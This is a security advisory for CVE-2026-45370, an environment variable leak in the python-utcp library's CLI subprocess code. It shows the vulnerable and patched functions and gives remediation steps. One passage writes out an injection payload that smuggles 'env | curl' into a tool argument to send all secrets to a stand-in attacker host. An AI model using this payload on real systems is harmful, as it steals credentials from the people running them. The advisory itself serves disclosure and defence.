CVE-2026-45370: Environment Variable Leak in python-utcp CLI Subprocesses

The python-utcp library serves as the Python implementation of the Universal Tool Calling Protocol, facilitating interactions between applications and external CLI tools. Prior to version 1.1.3, the library contains a severe environment variable leakage vulnerability tracked as CVE-2026-45370. The flaw resides in the cli_communication_protocol.py module, specifically within the _prepare_environment() function.

When setting up the execution context for spawned subprocesses, the library automatically exports a complete copy of the parent process environment. This design flaw violates the principle of least privilege by exposing all process-level configuration data to the external tool. The exposed data typically includes highly sensitive materials such as database connection strings, cloud provider credentials, and master API keys.

This exposure represents a critical security risk due to its high synergy with command injection flaws. When an attacker chains this vulnerability with CVE-2026-45369, they can achieve arbitrary command execution and simultaneously exfiltrate all inherited secrets. The combination of these two vulnerabilities transforms a localized injection flaw into a complete compromise of the application environment.

The root cause of CVE-2026-45370 is the unsafe inheritance of environment variables during subprocess creation. When a tool is invoked via the CLI protocol, the library calls the _prepare_environment() method to establish the execution environment for the new child process. The implementation utilizes the os.environ.copy() method without applying any filtering or sanitization to the inherited dataset.

By invoking os.environ.copy(), the library captures every variable present in the host application memory space at the time of execution. LLM agents and orchestration servers frequently load all necessary API keys and access tokens into the main process environment upon startup. Consequently, every CLI tool spawned by the library receives direct access to these secrets, regardless of whether the tool explicitly requires them to function.

These variables are subsequently passed directly to the env argument of the subprocess.run() or subprocess.Popen() functions. The operating system then loads these values into the memory space of the spawned shell. Any process executed within this shell, whether legitimate or malicious, possesses the capability to read and transmit these variables to external destinations.

The vulnerability originates from a common oversight in Python subprocess management. In the vulnerable implementation, the _prepare_environment() method retrieves the full environment dictionary and returns it for use in the subprocess call. The function performs no inspection of the keys being passed, acting as a blind pass-through for sensitive memory.

# Vulnerable Implementation
def _prepare_environment(self) -> dict:
    # Inherits the entire parent environment, including all sensitive secrets
    return os.environ.copy()

The remediation strategy requires modifying the environment preparation logic to enforce an allowlist or return a minimally viable environment. By explicitly defining which variables the child process receives, developers prevent the accidental propagation of host secrets. The patched version 1.1.3 implements a restricted environment model that prevents arbitrary variable inheritance.

# Mitigated Implementation Pattern
def _prepare_environment(self) -> dict:
    # Restricts environment to strictly necessary system variables
    safe_env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        "SYSTEMROOT": os.environ.get("SYSTEMROOT", "")
    }
    return safe_env

Exploiting CVE-2026-45370 relies on the attacker first securing execution capabilities within the subprocess context. This is typically achieved by exploiting CVE-2026-45369, a command injection vulnerability located within the _substitute_utcp_args method of the same component. The attacker initiates the exploit chain by submitting a crafted payload designed to break out of the intended tool command structure.

The attacker provides a tool call argument containing shell metacharacters and the env command, such as input="; env | curl -X POST -d @- http://attacker.com/log #". The vulnerable substitution logic inserts this payload directly into the shell execution string. When the operating system parses the string, it executes the legitimate command, followed immediately by the injected env sequence.

Because _prepare_environment() populated the shell with the parent process variables, the env command outputs the complete secret configuration. The attacker pipes this output directly into curl, transmitting the entire environment block to an external listening server. This exfiltration occurs synchronously within the single tool call request.

The exploitation of this vulnerability results in a total loss of confidentiality for all process-level secrets. In modern deployment architectures, environment variables serve as the primary mechanism for distributing sensitive configuration data to application containers. An attacker successfully executing this chain gains immediate access to AWS access keys, OpenAI tokens, database URIs, and authentication salts.

The CVSS v3.1 base score of 7.7 reflects the high severity of the exposure despite the lack of direct system integrity impact. The vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N highlights that the vulnerability is exploitable over the network with low complexity. The changed scope (S:C) indicates that a vulnerability within the tool-calling library compromises the confidentiality of the broader host application environment.

The secondary consequences of this data exposure are severe. Attackers utilizing the stolen credentials can pivot into connected cloud infrastructure, access proprietary database records, or incur substantial financial charges on LLM provider accounts. The immediate exfiltration of all keys eliminates the need for the attacker to maintain persistent access to the compromised server.

The primary remediation for CVE-2026-45370 is an immediate upgrade to python-utcp version 1.1.3 or later. The patched version modifies the environment handling logic to ensure that sensitive parent variables are not automatically propagated to CLI subprocesses. System administrators should verify the deployed library version across all environments utilizing the Universal Tool Calling Protocol.

If applying the patch is not immediately feasible, developers can manually override the _prepare_environment() method within their tool configurations. The overridden method must return a tightly controlled dictionary containing only the standard operating system paths necessary for basic executable discovery. Under no circumstances should os.environ.copy() be utilized in the temporary workaround.

Organizations must also adopt defense-in-depth measures to limit the blast radius of similar vulnerabilities. Applications should run within isolated container environments operating under the principle of least privilege. Sensitive master credentials should be replaced with scoped, short-lived tokens retrieved dynamically via dedicated secret management services.